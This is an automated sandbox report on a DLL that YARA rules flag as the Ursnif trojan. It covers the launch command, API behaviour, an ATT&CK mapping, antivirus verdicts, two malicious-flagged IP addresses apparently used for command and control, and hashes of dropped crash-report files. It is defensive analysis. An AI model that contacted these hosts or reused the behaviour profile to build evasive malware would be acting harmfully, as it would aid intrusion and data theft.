Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_044B3365 cpuid

3_2_044B3365

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_004010C4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

3_2_004010C4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00401C83 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

3_2_00401C83

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_044B3365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_044B3365

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	111 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	111 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Rundll32	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	14 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
62835e34e60c1.dll	29%	ReversingLabs	Win32.Trojan.Generic
62835e34e60c1.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.rundll32.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
3.2.rundll32.exe.44b0000.1.unpack	100%	Avira	HEUR/AGEN.1245293		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://185.18	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
l-0007.l-dc-msedge.net	13.107.43.16	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.18	rundll32.exe, 00000003.00000002.952097072.0000000004A0B000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.189.151.70	unknown	Switzerland		51395	AS-SOFTPLUSCH	true
185.189.151.28	unknown	Switzerland		51395	AS-SOFTPLUSCH	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	628111
Start date and time: 17/05/202210:45:07	2022-05-17 10:45:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	62835e34e60c1.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@8/12@0/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 48.3% (good quality ratio 44.7%) Quality average: 78.7% Quality standard deviation: 30.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .dll Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.189.173.20, 13.107.43.16
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 62835e34e60c1.dll

Simulations

Behavior and APIs

Time	Type	Description
10:46:30	API Interceptor	2x Sleep call for process: WerFault.exe modified
10:46:42	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.189.151.28	xaj0e933Uv.dll	Get hash	malicious	Browse
	tIJVb0BvkI.dll	Get hash	malicious	Browse
	XoVzWJQAQ0.dll	Get hash	malicious	Browse
	qOfIxt1fnQ.dll	Get hash	malicious	Browse
	2oCOO5LbPu.dll	Get hash	malicious	Browse
	rXN8OIpbzz.dll	Get hash	malicious	Browse
	GlJdt15gDI.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
l-0007.l-dc-msedge.net	xaj0e933Uv.dll	Get hash	malicious	Browse	13.107.43.16
	2oCOO5LbPu.dll	Get hash	malicious	Browse	13.107.43.16
	rXN8OIpbzz.dll	Get hash	malicious	Browse	13.107.43.16
	Invoice#396.html	Get hash	malicious	Browse	13.107.43.16
	Urgentn#U00a1 objedn#U00a0vka.pdf.exe	Get hash	malicious	Browse	13.107.43.16
	pDut.dll	Get hash	malicious	Browse	13.107.43.16
	HxEWwh74qT.dll	Get hash	malicious	Browse	13.107.43.16
	6253ed88d7cd5.dll	Get hash	malicious	Browse	13.107.43.16
	624c84a8263d3.dll	Get hash	malicious	Browse	13.107.43.16

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-SOFTPLUSCH	P5ASinnD4i.exe	Get hash	malicious	Browse	176.10.119.117
	5A30ie6lsZ.exe	Get hash	malicious	Browse	176.10.119.117
	OIpCcXM6Y5.exe	Get hash	malicious	Browse	176.10.119.117
	xaj0e933Uv.dll	Get hash	malicious	Browse	185.189.151.28
	tIJVb0BvkI.dll	Get hash	malicious	Browse	185.189.151.28
	XoVzWJQAQ0.dll	Get hash	malicious	Browse	185.189.151.28
	qOfIxt1fnQ.dll	Get hash	malicious	Browse	185.189.151.28
	2oCOO5LbPu.dll	Get hash	malicious	Browse	185.189.151.28
	rXN8OIpbzz.dll	Get hash	malicious	Browse	185.189.151.28
	GlJdt15gDI.dll	Get hash	malicious	Browse	185.189.151.28
	o52M6ZqBFp	Get hash	malicious	Browse	176.10.116.173
	com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apk	Get hash	malicious	Browse	176.10.119.156
	com.pagnotto28.sellsourcecode.supercleaner-9-apkplz.net.apk	Get hash	malicious	Browse	176.10.119.156
	com.pagnotto28.sellsourcecode.alpha-6-apkplz.net.apk	Get hash	malicious	Browse	176.10.119.156
	URGENT REQUEST FOR QUOTE_____Pdf.exe	Get hash	malicious	Browse	91.192.100.6
	Powerful Cleaner Antivirus_v1.9.apk	Get hash	malicious	Browse	176.10.119.156
	K74MviOR7d	Get hash	malicious	Browse	185.189.149.113
	xIOggpNWfl.exe	Get hash	malicious	Browse	176.10.107.180
	2X3f1ykTmM.exe	Get hash	malicious	Browse	176.10.99.208
	lwRhzjuYIg.exe	Get hash	malicious	Browse	176.10.99.203
AS-SOFTPLUSCH	P5ASinnD4i.exe	Get hash	malicious	Browse	176.10.119.117
	5A30ie6lsZ.exe	Get hash	malicious	Browse	176.10.119.117
	OIpCcXM6Y5.exe	Get hash	malicious	Browse	176.10.119.117
	xaj0e933Uv.dll	Get hash	malicious	Browse	185.189.151.28
	tIJVb0BvkI.dll	Get hash	malicious	Browse	185.189.151.28
	XoVzWJQAQ0.dll	Get hash	malicious	Browse	185.189.151.28
	qOfIxt1fnQ.dll	Get hash	malicious	Browse	185.189.151.28
	2oCOO5LbPu.dll	Get hash	malicious	Browse	185.189.151.28
	rXN8OIpbzz.dll	Get hash	malicious	Browse	185.189.151.28
	GlJdt15gDI.dll	Get hash	malicious	Browse	185.189.151.28
	o52M6ZqBFp	Get hash	malicious	Browse	176.10.116.173
	com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apk	Get hash	malicious	Browse	176.10.119.156
	com.pagnotto28.sellsourcecode.supercleaner-9-apkplz.net.apk	Get hash	malicious	Browse	176.10.119.156
	com.pagnotto28.sellsourcecode.alpha-6-apkplz.net.apk	Get hash	malicious	Browse	176.10.119.156
	URGENT REQUEST FOR QUOTE_____Pdf.exe	Get hash	malicious	Browse	91.192.100.6
	Powerful Cleaner Antivirus_v1.9.apk	Get hash	malicious	Browse	176.10.119.156
	K74MviOR7d	Get hash	malicious	Browse	185.189.149.113
	xIOggpNWfl.exe	Get hash	malicious	Browse	176.10.107.180
	2X3f1ykTmM.exe	Get hash	malicious	Browse	176.10.99.208
	lwRhzjuYIg.exe	Get hash	malicious	Browse	176.10.99.203

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_99e41d792528612ced890929ed2335749e1b7_7cac0383_1936fee1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7452936850874848
Encrypted:	false
SSDEEP:	96:wSFIYnYycy9hayCjmfIpXIQcQOgc6OIcEkcw3Ck+a+z+HbHgLVG4rmMXL9iVff9i:bVnSHn1OrjYq/u7s8S274ItWe
MD5:	5D78D57F729559A443C79E5A59602A60
SHA1:	8B718BCD1975ED4FC545B1CCDD1EA0F04B65AEBE
SHA-256:	82F011E579CA8166950C0032B5FE9B80F2E06DE3232722C97643FD56B30CA1A5
SHA-512:	775CDA5354541B6B47E1AC8B5B89887CC9405FE5C96F15A8D4AC807D7A8C94A4D1C35820177AE4B7C2C2751578A2CB87F279E3A6A8212168395CA06627358D9A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.8.3.1.9.2.2.4.6.0.6.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.2.8.3.1.9.3.5.8.9.8.4.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.0.c.8.b.0.1.-.d.2.3.3.-.4.b.c.2.-.a.1.0.7.-.e.a.2.1.3.c.7.7.4.d.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.3.0.5.3.3.7.-.4.7.c.e.-.4.3.6.9.-.b.9.3.f.-.6.a.7.f.9.7.b.f.4.4.e.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.1.4.-.0.0.0.1.-.0.0.1.7.-.3.7.f.0.-.e.b.0.3.1.6.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_cb7b105113bf417cfd7547dda3de839a49ae23_7cac0383_1942d7b1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7418484685932353
Encrypted:	false
SSDEEP:	96:FobYnYyDy9hayCj+kSZpXIQcQac6pcEccw35+a+z+HbHgLVG4rmMXL9iVff9oUOa:znCH0tGtjYq/u7s8S274Itb
MD5:	1B45805331EC87E9D6E9E9C47C6FBC22
SHA1:	CE7BF8C793F1C086E4B61AB1259136D3CFA6EB7F
SHA-256:	4CBF320D3CBF49D44DADDD12110B4BEDA791CED161FC807972A37618EEAC6AF8
SHA-512:	14A32C137A4EAE07253CD2B8EFCD9F3AF532BD772445C862AFEACB3507286E132CCEEA5A4183A12A8DB93EC8694037A89A4CCAF6CB26DA62AD703CB02C4A203C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.8.3.1.8.3.2.9.9.8.7.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.8.9.2.f.9.a.-.f.8.d.5.-.4.a.e.3.-.8.e.1.7.-.c.f.2.0.b.0.e.f.b.a.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.0.9.a.f.e.9.-.5.0.7.7.-.4.5.2.9.-.9.3.a.b.-.8.1.4.b.b.1.f.1.e.a.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.1.4.-.0.0.0.1.-.0.0.1.7.-.3.7.f.0.-.e.b.0.3.1.6.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_e912ab21695e486193197883960c42688442ed7_7cac0383_1836ecd0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7491020229109185
Encrypted:	false
SSDEEP:	96:zibF64kYnYy7y9haot7Jn7YpXIQcQac6pcEccw35+a+z+HbHgLVG4rmMXL9iVffM:I84bnxH0tGtjYq/u7s8S274ItW
MD5:	4D60D5D448683E30DDFBA46CC3734861
SHA1:	FD521E483FFC9DD56C0567EE10845D90BC4B71F2
SHA-256:	1899F5C4C3C5E42AC818CFA74CBD5AECE8318C043AAECFB107D436464E5AB047
SHA-512:	E2FE2A2C45291CF6D84E085BDDD95E29DF8A7FC151BE41456E48E2A849E271064176E0FF5D5745DD3BBD10188C77817491EA2B4F68F4B15580CC091DBCB8EDC5
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.8.3.1.8.6.9.5.9.8.4.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.2.8.3.1.8.8.5.5.3.6.2.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.d.e.6.f.4.6.-.9.e.1.1.-.4.e.6.e.-.9.2.c.f.-.5.a.0.c.0.3.4.a.e.c.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.e.3.6.6.e.1.-.9.6.c.5.-.4.7.e.c.-.9.f.b.9.-.6.2.3.e.a.2.2.d.d.c.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.1.4.-.0.0.0.1.-.0.0.1.7.-.3.7.f.0.-.e.b.0.3.1.6.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue May 17 17:46:23 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	36770
Entropy (8bit):	2.018958433339166
Encrypted:	false
SSDEEP:	192:fphFkOtRmeeGipOsbCtuqAb/3h3QSsh/PFnzkFmw43mCCo:3LRFeHssutjaTs5PF4Fmz
MD5:	92A084D95AD3C4D2A43976AB931C5653
SHA1:	513A46737BEE4579C9C38264FAAC27B00E9F998D
SHA-256:	9074EA3815B06E68FDD8E99060DD98740312B1E3997ED62DAE2C145A81AA66C8
SHA-512:	F902D4E56A79919ECAE8BF5B3F5BD05F29FE3C50FE9B25BDAEA0A3BA0EF7A02B4C0DC4696C1BE3110642642FA84833E4786F38D82827755879C5A23D87C3AEB1
Malicious:	false
Preview:	MDMP....... .......o.b........................L...........$................!..........`.......8...........T...........(...z............................................................................................U...........B..............GenuineIntelW...........T...........k.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4C4.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.6866150515390714
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNifl6n96YoySU8IZAMgmf2SuCpN/89bZ0i1fozm:RrlsNit6n96YtSU8Idgmf2SwZ0YfR
MD5:	153C30368B8BF499D723950830863E68
SHA1:	D5DD0DAE2DB1B0FDC511BB51D711D91218D7A410
SHA-256:	F99B459A4DEF2FEC02024A6C9987FC2B9CDDFC42DADFB1EC0D1E29D96CD64690
SHA-512:	2215A733753C41E8373BA7D6E80D32A008CEA2E7A654E01B37D00CA143A37C94F6AFBDAB6737C210FAE61EAF029163922F9C87D1BC521FF2B39A2462115D0161
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.6.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD67B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4665
Entropy (8bit):	4.415556146581757
Encrypted:	false
SSDEEP:	48:cvIwSD8zslJgtWI9rrWgc8sqYj88fm8M4J2+IkFsho+q8vQ+IsKcQIcQw0vd:uITf/AagrsqYFJiAKksKkw0vd
MD5:	B2716E86BF6E8EADD14CE30BE99EA6C9
SHA1:	1E4243D473402753215F6817B8F96EDCD2288CE3
SHA-256:	F3DAF4907EDD8E06E5CB89AAEFCE666C0948904E2E41656DF8CB837CFFA19E42
SHA-512:	7C958B5EFEDAE130CDA0596891920EBD3FB76C3BB8F288C94AC7EC7378D3E7251A824A17E9F1C3078A0EA4047408EDE9EAF7C6BF53E74F4A577125464F6D9F9D
Malicious:	false
